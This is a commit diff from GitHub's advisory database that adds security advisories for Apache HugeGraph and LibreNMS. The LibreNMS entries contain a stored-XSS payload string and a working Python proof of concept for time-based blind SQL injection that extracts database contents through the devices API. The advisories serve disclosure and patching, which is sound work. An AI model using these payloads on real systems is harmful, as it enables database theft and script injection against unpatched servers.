Publish Advisories

GHSA-h58v-c6rf-g9f7
GHSA-29rc-vq7f-x335
GHSA-6mgp-p75r-vhjm
GHSA-72m9-7c8x-pmmw
GHSA-77x4-55q7-4vmj
GHSA-cwx6-cx7x-4q34
GHSA-jh57-j3vq-h438
GHSA-qmmm-73r2-f8xr
GHSA-29rc-vq7f-x335
GHSA-6mgp-p75r-vhjm
GHSA-77x4-55q7-4vmj
This commit is contained in:
advisory-database[bot]
2024-04-22 18:39:19 +00:00
parent cf641369a0
commit 86195d333e
11 changed files with 467 additions and 110 deletions
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-h58v-c6rf-g9f7",
"modified": "2023-04-25T16:32:27Z",
"modified": "2024-04-22T18:36:58Z",
"published": "2021-07-01T17:00:04Z",
"aliases": [
"CVE-2021-35210"
@@ -0,0 +1,88 @@
{
"schema_version": "1.4.0",
"id": "GHSA-29rc-vq7f-x335",
"modified": "2024-04-22T18:37:52Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27348"
],
"summary": "Apache HugeGraph-Server: Command execution in gremlin",
"details": "RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hugegraph:hugegraph-api"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.3.0"
}
]
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hugegraph:hugegraph-core"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.3.0"
}
]
}
]
}
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27348"
},
{
"type": "WEB",
"url": "https://github.com/apache/incubator-hugegraph/commit/713d88d1fd9953c3c3e3f130389501910ba40e1d"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/incubator-hugegraph"
},
{
"type": "WEB",
"url": "https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9"
}
],
"database_specific": {
"cwe_ids": [
"CWE-77"
],
"severity": "CRITICAL",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:52Z",
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}
@@ -0,0 +1,65 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6mgp-p75r-vhjm",
"modified": "2024-04-22T18:37:58Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27349"
],
"summary": "Apache HugeGraph-Server: Bypass whitelist in Auth mode",
"details": "Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hugegraph:hugegraph-api"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.3.0"
}
]
}
]
}
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27349"
},
{
"type": "WEB",
"url": "https://github.com/apache/incubator-hugegraph/commit/713d88d1fd9953c3c3e3f130389501910ba40e1d"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/incubator-hugegraph"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/dz9n9lndqfsf64t72o73r7sttrc6ocsd"
}
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:58Z",
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}
@@ -0,0 +1,65 @@
{
"schema_version": "1.4.0",
"id": "GHSA-72m9-7c8x-pmmw",
"modified": "2024-04-22T18:37:27Z",
"published": "2024-04-22T18:37:27Z",
"aliases": [
"CVE-2024-32479"
],
"summary": "LibreNMS uses Improper Sanitization on Service template name leads to Stored XSS",
"details": "### Summary\nThere is improper sanitization on Service template name which is reflecting in delete button onclick event. This value can be modified and crafted as any other javascript code.\n\n \n### Vulnerable Code\nhttps://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23\n\nAbove is vulnerable code line which needs to be properly sanitized \n\n### PoC\n1. Go to /services/templates\n2. Enter name as `testing', '14', 'http://172.105.62.194:8000/services/templates/14');alert(1);//`\n3. Submit it and try to delete it, you will see popup\n\nIf you inspect element on delete button, you will notice this:-\n<img width=\"748\" alt=\"Screenshot 2023-11-23 at 9 30 24PM\" src=\"https://user-images.githubusercontent.com/31764504/285260018-7672a93d-e29b-4444-8057-e6ffcb8dabfc.png\">\n\n\n### Impact\nCross site scripting can lead to cookie stealing or an attacker can execute any other feature using this feature.\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "librenms/librenms"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "24.4.0"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-72m9-7c8x-pmmw"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/commit/19344f0584d4d6d4526fdf331adc60530e3f685b"
},
{
"type": "PACKAGE",
"url": "https://github.com/librenms/librenms"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23"
}
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:27Z",
"nvd_published_at": null
}
}
@@ -0,0 +1,61 @@
{
"schema_version": "1.4.0",
"id": "GHSA-77x4-55q7-4vmj",
"modified": "2024-04-22T18:37:45Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27347"
],
"summary": "Apache HugeGraph-Hubble: SSRF in Hubble connection page",
"details": "Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble. This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hugegraph:hugegraph-hubble"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.3.0"
}
]
}
]
}
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27347"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/incubator-hugegraph-toolchain"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/z0v71148slfkw60hsp35pl7ddjyvg01l"
}
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:45Z",
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}
@@ -0,0 +1,65 @@
{
"schema_version": "1.4.0",
"id": "GHSA-cwx6-cx7x-4q34",
"modified": "2024-04-22T18:37:21Z",
"published": "2024-04-22T18:37:21Z",
"aliases": [
"CVE-2024-32461"
],
"summary": "LibreNMS vulnerable to SQL injection time-based leads to database extraction",
"details": "### Summary\nSQL injection vulnerability in POST /search/search=packages in LibreNMS 24.3.0 allows a user with global read privileges to execute SQL commands via the package parameter. \n\n### Details\nThere is a lack of hygiene of data coming from the user in line 83 of the file librenms/includes/html/pages/search/packages.inc.php\n![vulnerability](https://github.com/librenms/librenms/assets/58785171/3ad76f72-e62b-475e-84a0-4024e751f44c)\n\n### PoC\nhttps://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6\n\n### Impact\nWith this vulnerability, we can exploit a SQL injection time based vulnerability to extract all data from the database, such as administrator credentials\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "librenms/librenms"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "24.4.0"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-cwx6-cx7x-4q34"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/commit/d29201fce134347f891102699fbde7070debee33"
},
{
"type": "WEB",
"url": "https://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6"
},
{
"type": "PACKAGE",
"url": "https://github.com/librenms/librenms"
}
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:21Z",
"nvd_published_at": null
}
}
@@ -0,0 +1,61 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jh57-j3vq-h438",
"modified": "2024-04-22T18:37:35Z",
"published": "2024-04-22T18:37:35Z",
"aliases": [
"CVE-2024-32480"
],
"summary": "LibreNMS vulnerable to a Time-Based Blind SQL injection leads to database extraction",
"details": "### Summary\nGet a valid API token, make sure you can access api functions, then replace string on my PoC code, Test on offical OVA image, it's a old version 23.9.1, but this vulerable is also exists on latest version 24.2.0\n\n### Details\nin file `api_functions.php`, line 307 for function list_devices\n\n```php\n$order = $request->get('order');\n $type = $request->get('type');\n $query = $request->get('query');\n $param = [];\n\n if (empty($order)) {\n $order = 'hostname';\n }\n\n if (stristr($order, ' desc') === false && stristr($order, ' asc') === false) {\n $order = 'd.`' . $order . '` ASC';\n }\n /* ... */\n $devices = [];\n $dev_query = \"SELECT $select FROM `devices` AS d $join WHERE $sql GROUP BY d.`hostname` ORDER BY $order\";\n foreach (dbFetchRows($dev_query, $param) as $device) {\n```\nThe \"order\" parameter is obtained from $request. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability.\n\n### PoC\nFor example. this PoC is get current db user\n```python\nimport string\nimport requests\n\nheaders = {\n\t'X-Auth-Token': 'token_string'\n}\nreq = requests.Session()\npayloads = '_-@.,' + string.digits + string.ascii_letters\nurl = 'http://host/api/v0/devices?order=device_id` and if(ascii(substr(user(),%d,1))=%d,sleep(5),1) and d.`device_id'\nresult = 'user: '\nfor i in range(10):\n\tfor payload in payloads:\n\t\ttry:\n\t\t\treq.get(url % (i+1, ord(payload)), headers=headers, timeout=3)\n\t\texcept requests.exceptions.ReadTimeout as ex:\n\t\t\tresult += payload\n\t\t\tprint(result),\n\t\texcept Exception as e:\n\t\t\tpass\n```\n![QQ截图20240306181404](https://github.com/librenms/librenms/assets/11938870/017cc413-ce1e-45a2-b0f1-a0ae83bbbeee)\n\n### Impact\nAttacker can extract whole database",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "librenms/librenms"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "24.4.0"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438"
},
{
"type": "WEB",
"url": "https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c"
},
{
"type": "PACKAGE",
"url": "https://github.com/librenms/librenms"
}
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T18:37:35Z",
"nvd_published_at": null
}
}
File diff suppressed because one or more lines are too long
@@ -1,39 +0,0 @@
{
"schema_version": "1.4.0",
"id": "GHSA-29rc-vq7f-x335",
"modified": "2024-04-22T15:30:41Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27348"
],
"details": "RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27348"
},
{
"type": "WEB",
"url": "https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}
@@ -1,35 +0,0 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6mgp-p75r-vhjm",
"modified": "2024-04-22T15:30:41Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27349"
],
"details": "Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27349"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/dz9n9lndqfsf64t72o73r7sttrc6ocsd"
}
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}
@@ -1,35 +0,0 @@
{
"schema_version": "1.4.0",
"id": "GHSA-77x4-55q7-4vmj",
"modified": "2024-04-22T15:30:41Z",
"published": "2024-04-22T15:30:41Z",
"aliases": [
"CVE-2024-27347"
],
"details": "Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble.This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27347"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/z0v71148slfkw60hsp35pl7ddjyvg01l"
}
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-22T14:15:07Z"
}
}